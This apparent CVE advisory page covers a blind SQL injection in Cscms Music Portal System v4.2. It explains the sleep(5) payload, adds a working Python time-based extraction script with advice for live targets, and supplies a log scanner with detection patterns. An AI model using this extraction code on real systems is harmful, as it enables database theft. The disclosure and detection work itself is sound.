CVE-2022-27365
Description
Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Dance.php_del.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cscms Music Portal System v4.2 contains a blind SQL injection vulnerability in the `dance_Dance.php_del` component via a crafted `id` parameter.
Vulnerability
Cscms Music Portal System v4.2 is affected by a blind SQL injection vulnerability in the dance_Dance.php_del component. An authenticated administrator can inject SQL into the id parameter when deleting dance items (e.g., songs) from the recycle bin. The vulnerability is reachable via a POST request to /admin.php/dance/admin/dance/del with a crafted id value. The CVE record lists only v4.2 as affected.
Exploitation
An attacker must possess administrative credentials and be able to log into the backend. After logging in, the attacker navigates to the dance management section and sends a POST request to the delete endpoint (/admin.php/dance/admin/dance/del) with a malicious id parameter. The proof of concept in reference [1] injects id=7)and(sleep(5))--+: the leading 7) suggests the value is interpolated inside parentheses in the query, sleep(5) delays the statement by 5 seconds, and --+ (the + decodes to the space MySQL requires after --) comments out the remainder of the statement. A response that is consistently about 5 seconds slower than a control request confirms time-based blind SQL injection.
Impact
Successful exploitation allows an authenticated admin to execute arbitrary SQL, which can lead to exfiltration, modification, or deletion of database contents. Because the injection is blind, no query output is returned directly; the attacker instead infers data from timing (as in the sleep(5) PoC) or from differences in the response, retrieving values character by character. Administrative access is required, but the impact can extend to full compromise of the database.
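The Exploitation and Impact sections above describe a single sleep(5) probe and the character-by-character retrieval it enables. The following is an added example, not code from this page or from the Cscms project, that generalizes the probe into a time-based extraction loop. What it keeps from the page is the injection context `7)and(...)--+` and the `id` parameter of the delete endpoint; the MySQL `if/substring/ascii` construction, the 5-second delay constant, the placeholder subquery `select version()`, and the `FakeBackend` that stands in for the real endpoint so the code runs offline are all assumptions.

```python
"""Time-based blind SQL injection, generalized from the single sleep(5) probe.

Added example, not code from this page or from the Cscms project. The
injection context `7)and(...)--+` and the `id` parameter follow the PoC
quoted on the page; everything else here is an assumption.
"""
import re
import time
from typing import Callable, Dict

DELAY = 5  # seconds; same sleep duration as the PoC on this page


def build_probe(position: int, threshold: int,
                subquery: str = "select version()") -> str:
    """Payload for the `id` parameter: sleep only if the ASCII code of the
    character at `position` of the subquery result is greater than `threshold`.
    The trailing `--+` is the URL-encoded `-- ` that MySQL needs to open a comment."""
    return (f"7)and(if(ascii(substring(({subquery}),{position},1))>{threshold},"
            f"sleep({DELAY}),0))--+")


def extract(oracle: Callable[[str], bool], length: int,
            subquery: str = "select version()") -> str:
    """Recover `length` characters of the subquery result one at a time.
    `oracle(payload)` must return True when the server took the slow path.
    Binary search over 0..127 costs 7 requests per character instead of 128."""
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127          # invariant: the true code is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_probe(pos, mid, subquery)):
                lo = mid + 1     # server slept, so code > mid
            else:
                hi = mid         # server answered fast, so code <= mid
        chars.append(chr(lo))
    return "".join(chars)


def timing_oracle(send: Callable[[str], object],
                  delay: float = DELAY) -> Callable[[str], bool]:
    """Wrap a real sender (e.g. an authenticated session's POST to
    /admin.php/dance/admin/dance/del with data={"id": payload}) and decide
    by wall-clock time. Repeat borderline probes: network jitter is real."""
    def oracle(payload: str) -> bool:
        start = time.monotonic()
        send(payload)
        return time.monotonic() - start >= delay
    return oracle


# Hypothetical offline stand-in for the vulnerable endpoint, constructed for this
# example. It parses the probe the way MySQL would evaluate it and returns the
# elapsed time the request *would* have taken, without actually sleeping.
PROBE_RE = re.compile(
    r"^7\)and\(if\(ascii\(substring\(\((.+?)\),(\d+),1\)\)>(\d+),sleep\((\d+)\),0\)\)--\+$")


class FakeBackend:
    def __init__(self, results: Dict[str, str]):
        self.results = results   # subquery text -> what that subquery would return

    def post(self, id_value: str) -> float:
        base = 0.05              # normal delete round-trip, in seconds
        m = PROBE_RE.match(id_value)
        if not m:
            return base
        subquery, pos = m.group(1), int(m.group(2))
        threshold, delay = int(m.group(3)), int(m.group(4))
        value = self.results[subquery]
        ch = value[pos - 1] if pos <= len(value) else ""   # MySQL: substring past the end is ''
        code = ord(ch) if ch else 0                          # MySQL: ascii('') is 0
        return base + (delay if code > threshold else 0)


if __name__ == "__main__":
    backend = FakeBackend({"select version()": "5.7.40"})   # constructed result
    print(extract(lambda p: backend.post(p) >= DELAY, 6))
```

Against a live target, replace the lambda with `timing_oracle(...)` around whatever performs the authenticated POST; send a control probe with `sleep(0)` first so the baseline latency is known, and treat a single slow response as inconclusive.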
Mitigation
No official fix has been released as of the publication date (2022-04-15). The vendor has not responded to the reported issue on the GitHub issue tracker [1]. Until a patch is available, administrators should restrict backend access to trusted users, avoid exposing the admin interface to the public internet, and monitor database logs for anomalies such as delay functions (sleep(), benchmark()) or comment sequences appearing in queries issued by the admin interface. The vulnerability is not listed on the CISA KEV catalog.
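One concrete form of the log monitoring suggested above, as an added example that is not from this page or from the Cscms project: a scanner over MySQL general query log lines that flags the signatures the PoC leaves behind. The log lines are constructed, and the DELETE statement shape and the table name are assumptions, since the page does not show the SQL the application actually builds.

```python
"""Flag time-based SQL injection probes in MySQL general_log lines.

Added example, not from this page or the Cscms project. The sample log and
the statement shape are constructed; only the payload text comes from the page.
"""
import re
from typing import List, Tuple

# Constructed sample in general_log table-less format: timestamp, thread id,
# command, argument. Lines 2 and 4 carry the PoC payload and an extension of it.
SAMPLE_LOG = "\n".join([
    "2022-04-15T10:21:05.103Z\t   12 Query\tDELETE FROM cscms_dance WHERE id in (7)",
    "2022-04-15T10:21:09.411Z\t   12 Query\tDELETE FROM cscms_dance WHERE id in (7)and(sleep(5))-- ",
    "2022-04-15T10:21:20.008Z\t   13 Query\tSELECT * FROM cscms_dance WHERE id in (8,9)",
    "2022-04-15T10:21:25.550Z\t   12 Query\tDELETE FROM cscms_dance WHERE id in "
    "(7)and(if(ascii(substring((select version()),1,1))>64,sleep(5),0))-- ",
])

LOG_RE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")
# Functions that serve no purpose in a delete except as a delay primitive.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A comment opened right after a closing parenthesis is how the PoC discards
# the rest of the original statement.
COMMENT_RE = re.compile(r"\)\s*(--|#)")


def scan(log: str) -> List[Tuple[int, str, str]]:
    """Return (line number, thread id, reason) for each suspicious query."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m or m.group(3) != "Query":
            continue
        thread, sql = m.group(2), m.group(4)
        if DELAY_RE.search(sql):
            hits.append((n, thread, "delay primitive in query"))
        elif COMMENT_RE.search(sql):
            hits.append((n, thread, "statement truncated by comment"))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The general log is expensive in production; the same two patterns can be applied to web server or WAF logs whenever the POST body (the `id` field) is recorded, and the thread id lets the flagged statement be tied back to the admin session that issued it.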
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Cscms / Music Portal System
- Range: = 4.2
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] github.com/chshcms/cscms/issues/12
News mentions
No linked articles in our index yet.